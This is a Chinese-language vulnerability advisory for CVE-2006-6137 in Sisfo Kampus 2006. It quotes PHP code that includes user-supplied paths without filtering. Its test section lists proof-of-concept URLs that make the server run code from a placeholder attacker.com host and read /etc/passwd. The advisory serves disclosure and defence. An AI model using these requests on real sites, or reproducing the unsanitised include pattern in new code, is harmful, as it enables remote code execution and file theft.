安全研究

安全漏洞
Sisfo Kampus文件包含及目录遍历漏洞

发布日期:2006-11-27
更新日期:2006-11-28

受影响系统:
E. Setio Dewo Sisfo Kampus 2006 (Semarang 3)
描述:
BUGTRAQ  ID: 21294
CVE(CAN) ID: CVE-2006-6137

Sisfo Kampus是一款系统信息管理系统。

Sisfo Kampus在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

Sisfo Kampus的index.php和print.php脚本没有过滤slnt参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。

index.php中漏洞代码如下:

       -------------------------[Line 27]-----------------------------
       <?php
          if ($exec=='main.php' && file_exists("$themedir/main.php"))
               include "$themedir/main.php";
               else include $exec;
       ?>
       -------------------------[Line 31]------------------------------

print.php中漏洞代码如下:

       -------------------------[Line 15]------------------------------
       <?php
       include_once "sysfo/sysfo.common.php";

       if (isset($_REQUEST['print'])) {
       $print = $_REQUEST['print'];
       include "$print";
       }
       else die (DisplayHeader($fmtErrorMsg, $strNoDataTobePrint));

       include "disconnectdb.php";
       ?>
       -------------------------[Line 25]-------------------------------

此外,Sisfo Kampus的downloadexcel.php脚本没有正确过滤fn参数的输入,允许攻击者通过目录遍历攻击下载任意文件。

download.php中漏洞代码如下:

       -------------------------[Line 1]--------------------------------
       <?php
       DisplayHeader($fmtPageTitle, $strDownload);
       include "lib/file.common.php";
       if (isset($_REQUEST['dir'])) $dir = $_REQUEST['dir'];
       else $dir = $Download_dir;
       if (substr($dir, -1) != '/' && substr($dir, -1) != '\\') $dir = "$dir/";
       DisplayDownloadDir($dir);
       ?>
       -------------------------[Line 8]--------------------------------

<*来源:E. Setio Dewo (setio_dewo@telkom.net
        Wawan Firmansyah (angkaramurka2003@yahoo.com
  
  链接:http://secunia.com/advisories/23109/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=download&dir=/etc/passwd

建议:
厂商补丁:

E. Setio Dewo
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.sisfokampus.net

浏览次数:3157
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障